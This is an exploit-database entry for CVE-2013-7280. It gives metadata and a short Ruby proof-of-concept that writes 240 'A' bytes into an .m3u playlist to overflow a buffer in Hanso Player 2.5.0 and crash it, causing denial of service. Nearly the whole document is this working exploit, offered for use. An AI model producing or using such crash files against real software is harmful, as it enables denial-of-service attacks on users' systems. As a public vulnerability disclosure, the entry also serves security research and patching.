[] NeoSense

Hanso Player 2.5.0 - 'm3u' Buffer Overflow (Denial of Service)

Author: Necmettin COSKUN
type: dos
platform: windows
port: 
date_added: 2013-11-08 
date_updated: 2015-04-21 
verified: 1 
codes: OSVDB-90816;CVE-2013-7280 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt29500/screen-shot-2013-11-08-at-122224.png 
application_url: 

#!/usr/bin/env ruby
# coding:UTF-8
# Exploit Title:Hanso Player 2.5.0 Buffer Overflow
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Vendor :www.hansotools.com
# Software link:http://www.hansotools.com/downloads/hanso-player-setup.exe
# version: 2.5.0
# Tested on: windows XP sp2

DENEME = "\x41" * 240

File.open('hanzo.m3u', 'w') do |bofdosya|
bofdosya.puts (DENEME)
bofdosya.close()
end